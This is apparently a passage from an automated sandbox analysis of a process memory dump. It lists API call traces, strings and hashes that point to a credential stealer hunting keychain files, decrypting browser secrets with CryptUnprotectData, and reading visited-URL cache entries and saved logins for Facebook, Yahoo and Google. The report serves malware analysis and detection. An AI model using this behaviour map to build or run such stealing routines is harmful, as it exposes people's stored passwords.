                                                                                                                                                                                                  • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                                                                                                                                                                                  • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                                                                                                                                                                                  • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                                                                                                                                  • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000), ref: 004450F7
                                                                                                                                                                                                • memset.MSVCRT ref: 00445B52
                                                                                                                                                                                                • memset.MSVCRT ref: 00445B6A
                                                                                                                                                                                                • memset.MSVCRT ref: 00445C9B
                                                                                                                                                                                                • memset.MSVCRT ref: 00445CB3
                                                                                                                                                                                                • _wcsicmp.MSVCRT ref: 00445D56
                                                                                                                                                                                                • memset.MSVCRT ref: 00445B82
                                                                                                                                                                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                                                                                                                  • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                                                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                                                                                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                                                                                                                  • Part of subcall function 0040B6EF: CreateFileW.KERNEL32(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                                                                                                  • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                                                                                                                                                                  • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                                                                                                                                                                • memset.MSVCRT ref: 00445986
                                                                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AttributesCloseCreateFolderHandlePathSizeSpecial_wcsicmp_wcslwrmemcpywcscatwcscpywcsncmp
                                                                                                                                                                                                • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                                                                                                                                                                • API String ID: 2334598624-3798722523
                                                                                                                                                                                                • Opcode ID: 54cd37d9fea90df649edfac64ca330d920c47cac007ddae39c26186bf891e53c
                                                                                                                                                                                                • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                                                                                                                                                                                • Opcode Fuzzy Hash: 54cd37d9fea90df649edfac64ca330d920c47cac007ddae39c26186bf891e53c
                                                                                                                                                                                                • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                                                                                                                                                  • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                                                                                                                                                  • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                                                                                                                • SetErrorMode.KERNEL32(00008001), ref: 00412799
                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
                                                                                                                                                                                                • EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Library$EnumErrorFreeHandleLoadMessageModeModuleResourceTypes
                                                                                                                                                                                                • String ID: $/deleteregkey$/savelangfile
                                                                                                                                                                                                • API String ID: 1442760552-28296030
                                                                                                                                                                                                • Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                                                                                                                                • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                                                                                                                                                                                • Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                                                                                                                                • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • memset.MSVCRT ref: 0040B71C
                                                                                                                                                                                                  • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                                                                                                                                                                                  • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                                                                                                                                                                • wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                                                                                • memset.MSVCRT ref: 0040B756
                                                                                                                                                                                                • memset.MSVCRT ref: 0040B7F5
                                                                                                                                                                                                • CreateFileW.KERNEL32(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040B838
                                                                                                                                                                                                • memset.MSVCRT ref: 0040B851
                                                                                                                                                                                                • memset.MSVCRT ref: 0040B8CA
                                                                                                                                                                                                • memcmp.MSVCRT ref: 0040B9BF
                                                                                                                                                                                                  • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                                                                                  • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                                                                                                                                                • memset.MSVCRT ref: 0040BB53
                                                                                                                                                                                                • memcpy.MSVCRT(?,00000000,?,00000000,00000000,?), ref: 0040BB66
                                                                                                                                                                                                • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: memset$Freewcsrchr$CloseCreateCryptDataFileHandleLibraryLocalUnprotectmemcmpmemcpywcscpy
                                                                                                                                                                                                • String ID: chp$v10
                                                                                                                                                                                                • API String ID: 229402216-2783969131
                                                                                                                                                                                                • Opcode ID: 0f77db0472bd63cf26258024439ab2a975461d6804070ba6b678b1f2ee2b0392
                                                                                                                                                                                                • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                                                                                                                                                                                • Opcode Fuzzy Hash: 0f77db0472bd63cf26258024439ab2a975461d6804070ba6b678b1f2ee2b0392
                                                                                                                                                                                                • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                                                                                                                                                                  • Part of subcall function 0040DD85: CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                                                                                                                  • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                                                                                                                  • Part of subcall function 0040DD85: CloseHandle.KERNEL32(C0000004), ref: 0040DE3E
                                                                                                                                                                                                  • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                                                                                                                  • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                                                                                                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                                                • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                                                                                                                • DuplicateHandle.KERNEL32(?,00000104,00000000), ref: 0040E0BF
                                                                                                                                                                                                • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                                                                                                                  • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?), ref: 00409A5C
                                                                                                                                                                                                  • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                                                                                                  • Part of subcall function 00409A45: GetTempFileNameW.KERNEL32(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                                                                                                  • Part of subcall function 004096DC: CreateFileW.KERNEL32(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                                                                                                                • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                                                                                                                • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                                                                                                                • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 0040E13E
                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 0040E148
                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                                                                                                                                                                • String ID: bhv
                                                                                                                                                                                                • API String ID: 4234240956-2689659898
                                                                                                                                                                                                • Opcode ID: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                                                                                                                                                • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                                                                                                                                                                                • Opcode Fuzzy Hash: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                                                                                                                                                • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 562 4466f4-44670e call 446904 GetModuleHandleA 565 446710-44671b 562->565 566 44672f-446732 562->566 565->566 567 44671d-446726 565->567 568 44675b-4467aa __set_app_type __p__fmode __p__commode call 4153f2 566->568 570 446747-44674b 567->570 571 446728-44672d 567->571 575 4467ac-4467b7 __setusermatherr 568->575 576 4467b8-44680e call 4468f0 _initterm GetEnvironmentStringsW _initterm 568->576 570->566 574 44674d-44674f 570->574 571->566 573 446734-44673b 571->573 573->566 577 44673d-446745 573->577 578 446755-446758 574->578 575->576 581 446810-446819 576->581 582 44681e-446825 576->582 577->578 578->568 583 4468d8-4468dd call 44693d 581->583 584 446827-446832 582->584 585 44686c-446870 582->585 588 446834-446838 584->588 589 44683a-44683e 584->589 586 446845-44684b 585->586 587 446872-446877 585->587 593 446853-446864 GetStartupInfoW 586->593 594 44684d-446851 586->594 587->585 588->584 588->589 589->586 591 446840-446842 589->591 591->586 595 446866-44686a 593->595 596 446879-44687b 593->596 594->591 594->593 597 44687c-446894 GetModuleHandleA call 41276d 595->597 596->597 600 446896-446897 exit 597->600 601 44689d-4468d6 _cexit 597->601 600->601 601->583
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(00000000,0044E4C0,00000070), ref: 00446703
                                                                                                                                                                                                • __set_app_type.MSVCRT ref: 00446762
                                                                                                                                                                                                • __p__fmode.MSVCRT ref: 00446777
                                                                                                                                                                                                • __p__commode.MSVCRT ref: 00446785
                                                                                                                                                                                                • __setusermatherr.MSVCRT ref: 004467B1
                                                                                                                                                                                                • _initterm.MSVCRT ref: 004467C7
                                                                                                                                                                                                • GetEnvironmentStringsW.KERNEL32(?,?,?,?,0044E494,0044E498), ref: 004467EA
                                                                                                                                                                                                • _initterm.MSVCRT ref: 004467FD
                                                                                                                                                                                                • GetStartupInfoW.KERNEL32(?), ref: 0044685A
                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00446880
                                                                                                                                                                                                • exit.MSVCRT ref: 00446897
                                                                                                                                                                                                • _cexit.MSVCRT ref: 0044689D
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: HandleModule_initterm$EnvironmentInfoStartupStrings__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 2791496988-0
                                                                                                                                                                                                • Opcode ID: ac973ed8bce866ca224172ea4b7a237c44716a7d542afe8b7082d44fa5742df9
                                                                                                                                                                                                • Instruction ID: 0e3254bf032efe29fc581ce6ca9889a5a3d5d0d8e47fd2ea34fa35870f4f4cb9
                                                                                                                                                                                                • Opcode Fuzzy Hash: ac973ed8bce866ca224172ea4b7a237c44716a7d542afe8b7082d44fa5742df9
                                                                                                                                                                                                • Instruction Fuzzy Hash: 9D51C474C41314DFEB21AF65D8499AD7BB0FB0A715F21452BE82197291D7788C82CF1E

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • memset.MSVCRT ref: 0040C298
                                                                                                                                                                                                  • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                                  • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                                                                                                                                                                  • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                                                                                                                                                                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                                                • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                                                                                                                • wcschr.MSVCRT ref: 0040C324
                                                                                                                                                                                                • wcschr.MSVCRT ref: 0040C344
                                                                                                                                                                                                • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 0040C373
                                                                                                                                                                                                • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                                                                                                                                                                • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstFolderLastPathSpecial
                                                                                                                                                                                                • String ID: visited:
                                                                                                                                                                                                • API String ID: 2470578098-1702587658
                                                                                                                                                                                                • Opcode ID: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                                                                                                                                                • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                                                                                                                                                                                • Opcode Fuzzy Hash: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                                                                                                                                                • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 628 40e175-40e1a1 call 40695d call 406b90 633 40e1a7-40e1e5 memset 628->633 634 40e299-40e2a8 call 4069a3 628->634 636 40e1e8-40e1fa call 406e8f 633->636 640 40e270-40e27d call 406b53 636->640 641 40e1fc-40e219 call 40dd50 * 2 636->641 640->636 647 40e283-40e286 640->647 641->640 652 40e21b-40e21d 641->652 648 40e291-40e294 call 40aa04 647->648 649 40e288-40e290 free 647->649 648->634 649->648 652->640 653 40e21f-40e235 call 40742e 652->653 653->640 656 40e237-40e242 call 40aae3 653->656 656->640 659 40e244-40e26b _snwprintf call 40a8d0 656->659 659->640
                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                                                                                                                • memset.MSVCRT ref: 0040E1BD
                                                                                                                                                                                                  • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                                                                                                                • free.MSVCRT ref: 0040E28B
                                                                                                                                                                                                  • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                                                                                                                  • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                                                                                                                                                                                  • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                                                                                                                                                                • _snwprintf.MSVCRT ref: 0040E257
                                                                                                                                                                                                  • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                                                  • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                                                                                                                  • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                                                                                                                  • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                                                                                                                                                                • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                                                                                                                                                                • API String ID: 2804212203-2982631422
                                                                                                                                                                                                • Opcode ID: 366cc36c026cd150a239da38b4c6b1e2e10dbbf4b03b5b4663773bd365af82a7
                                                                                                                                                                                                • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                                                                                                                                                                                • Opcode Fuzzy Hash: 366cc36c026cd150a239da38b4c6b1e2e10dbbf4b03b5b4663773bd365af82a7
                                                                                                                                                                                                • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                                                                                                  • Part of subcall function 0040CC26: CloseHandle.KERNEL32(?), ref: 0040CC98
                                                                                                                                                                                                  • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                                                                                                                                • memset.MSVCRT ref: 0040BC75
                                                                                                                                                                                                • memset.MSVCRT ref: 0040BC8C
                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                                                                                                                                                                                • memcmp.MSVCRT ref: 0040BCD6
                                                                                                                                                                                                • memcpy.MSVCRT(00000024,?,00000020,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD2B
                                                                                                                                                                                                • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: memset$ByteCharCloseFileFreeHandleLocalMultiSizeWide_wcsicmpmemcmpmemcpy
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 115830560-3916222277
                                                                                                                                                                                                • Opcode ID: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                                                                                                                                                • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                                                                                                                                                                                • Opcode Fuzzy Hash: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                                                                                                                                                • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                                                                                                                                                                • String ID: r!A
                                                                                                                                                                                                • API String ID: 2791114272-628097481
                                                                                                                                                                                                • Opcode ID: e760b227a922d4e3f094a9eb3eb7a7fe7130a7247a75f8eef54ce2a40c46c596
                                                                                                                                                                                                • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                                                                                                                                                                                • Opcode Fuzzy Hash: e760b227a922d4e3f094a9eb3eb7a7fe7130a7247a75f8eef54ce2a40c46c596
                                                                                                                                                                                                • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                                                                                                                                  • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                                                                                                                                  • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                                                                                                                                                  • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                                                                                                                                                                                  • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                                                                                                                  • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                                                                                                                                                                                  • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                                                                                                                                                                                  • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                                                                                                                  • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                                                                                                                                                                                  • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                                                                                                                                                                                  • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                                                                                                                  • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                                                                                                                                                                                  • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                                                                                                                                                                                  • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                                                                                                                • _wcslwr.MSVCRT ref: 0040C817
                                                                                                                                                                                                  • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                                                                                                                                                                  • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                                                                                                                                                                • wcslen.MSVCRT ref: 0040C82C
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: memset$free$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                                                                                                                                                                • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                                                                                                                                                                • API String ID: 2936932814-4196376884
                                                                                                                                                                                                • Opcode ID: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                                                                                                                                                • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                                                                                                                                                                                • Opcode Fuzzy Hash: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                                                                                                                                                • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • memset.MSVCRT ref: 00403CBF
                                                                                                                                                                                                • memset.MSVCRT ref: 00403CD4
                                                                                                                                                                                                • memset.MSVCRT ref: 00403CE9
                                                                                                                                                                                                • memset.MSVCRT ref: 00403CFE
                                                                                                                                                                                                • memset.MSVCRT ref: 00403D13
                                                                                                                                                                                                  • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                                  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                                                  • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                                  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                                                                                  • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                                                                                • memset.MSVCRT ref: 00403DDA
